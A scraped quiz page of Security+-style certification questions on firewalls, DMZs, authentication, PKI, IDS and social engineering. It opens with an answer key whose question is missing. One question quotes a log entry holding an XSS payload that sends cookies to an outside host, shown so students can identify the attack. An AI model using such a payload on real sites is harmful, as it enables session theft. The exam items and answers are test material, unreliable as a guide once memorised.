Correct Answer(s)

A. Remove line 30
A. Remove line 40
A. Change the port to 995 on line 20

Explanation

The given firewall rules allow incoming traffic on ports 3389, 110, 69, 23, 22, and 443. However, the criteria state that users should be able to access an RDP server (port 3389), an HTTPS server (port 443), and incoming emails using SSL/TLS (port 995). Therefore, removing line 30 (which allows UDP traffic on port 69) and line 40 (which allows TCP traffic on port 23) would disallow unnecessary traffic. Additionally, changing the port to 995 on line 20 would allow incoming emails exclusively using SSL/TLS.

Rate this question:

3

Quiz Review Timeline (Updated): May 20, 2024 +

Our quizzes are rigorously reviewed, monitored and continuously updated by our expert board to maintain accuracy, relevance, and timeliness.

Current Version
May 20, 2024

Quiz Edited by
ProProfs Editorial Team
Jan 11, 2018

Quiz Created by
Catherine Halcomb

Can You Pass This System Administrator And Server Test?

Quiz Preview

A company employs a firewall to protect its internal network. An internal router resides directly behind the firewall and is used to segment traffic to different subnets. Which of the following terms MOST accurately describes the use of multiple devices in layers to protect a network?

A security administrator wants to implement a solution to encrypt communications between the company’s servers and client workstations. The solution must account for protocols at layers 4 through 7 of the OSI model. Which of the following should be implemented?

The Chief Information Security Officer receives notification that a high-ranking employee is stealing corporate secrets for a competing organization. This employee is now considered

A public-facing web server is added to an existing network. This server must be isolated from the production network. The BEST way to add this server to the existing network design is to place the server

An administrator places a server in “Permissive” mode to monitor security events before increasing system security. Which of the following tools is the administrator using?

With MDM, which of the following is the BEST policy to implement in case of device theft?

A security administrator needs to improve upon the current authentication system. The improved authentication system must require a second authentication factor must provide a new six-digit number only when a button is pressed on the device. Which of the following should be implemented?

A recent audit has revealed a long-term employee has access to shares in several different departments that are not related to the employee’s current position. Which of the following would reduce the likelihood of this issue occurring again?

A developer needs to store sensitive employee information on a back-end database. The sensitive database records must be accessed by a public web server in the DMZ. Which of the following should be implemented to secure the sensitive information stored in the database?

Which of the following uses signatures to ONLY detect network-based attacks?

A hospital uses legacy medical devices that are incompatible with OS upgrades. Which of the following should be used to secure these devices from unauthorized use by internal employees?

A security technician is reviewing a new vendor’s practices for a project, but the vendor only supplied SLA documentation. Which of the following should the security technician request to understand the vendor’s adherence to its own policies?

When authenticating to a database, users are required to use ten-character passwords and change their passwords every 60 days. Which of the following should also be added to this password policy to mitigate the possibility of password compromise? (Select TWO)

Which of the following should include a threat probability matrix?

A recent security audit revealed several unauthorized devices were plugged into network jacks in unused cubicles. Which of the following could be used to help the security administrator reduce investigative overhead if this scenario occurs again?

A security administrator notices the following anomaly when reviewing the web proxy logs: http://intranet/page.asp?variable=”> document. Location=’http://www.darkweb.com/?’20 document.cookie. Which of the following vulnerabilities is being exploited?

A server administrator recently implemented file system ACLs on a web server. The webmaster now reports the following message bash: vim: permission denied. Which of the following commands will assist in resolving the problem?

Ann, an employee, is attempting to send a digitally signed email to Joe, a manager. After applying the proper settings to her email. Ann is unable to sign the email digitally. This is most likely happening because there is an issue with

A security specialist is trying to determine the software product and version of several HTTP and SMTP servers on the network. The specialist decides a quick banner grab should suffice. Which of the following protocols would be the MOST helpful in accomplishing this goal?

During an assessment, an auditor observes employees holding the door for other personnel despite the presence of a swipe reader and an organizational policy that requires all personnel to swipe into secure areas. Which of the following did the auditor observe?

Joe a technician recently updated the intrusion detection signatures for new malware however, this rule has generated an overwhelming number of IDS alerts. The investigation from these events have been deemed non-threatening. These IDS alerts are considered to be

Which of the following are the BEST ways to prevent personally owned electronic devices from being connected to a corporate network? (select Two)

While creating the requirements for an upcoming project, the data owner classifies the data as critical to the success of the project, publicly available, available 85% of the time and requiring full backups each day. Which of the following security goals is MOST important for this project?

After completing an audit, the auditor releases the following finding to the security team: Finding 3A: Use of weak cryptographic authentication with no SALT. Which of the following cryptographic algorithms cause this finding? (select Two)

A PKI user has been compromised and the user’s certificate has been revoked. Which of the following protocols will the web application use to ensure the certificate cannot be used?

An administrator finds many employees are clicking on links in phishing emails. Which of the following should the administrator implement to protect workers who are tricked by these emails?

Which of the following risk mitigation strategies could be implemented to ensure IT staff does not implement unapproved modifications to the company’s email system?

A consulting firm has been hired to secure a new web application against XSS. Which of the following would be the BEST control to implement?

During a disaster recovery testing procedure a typically disabled service on the application server was started. Which of the following tools would BEST indentify situations in which the service is not shut down?

A consulting firm has been hired to secure a new web application against XSS. Which of the following would be the BEST control to implement?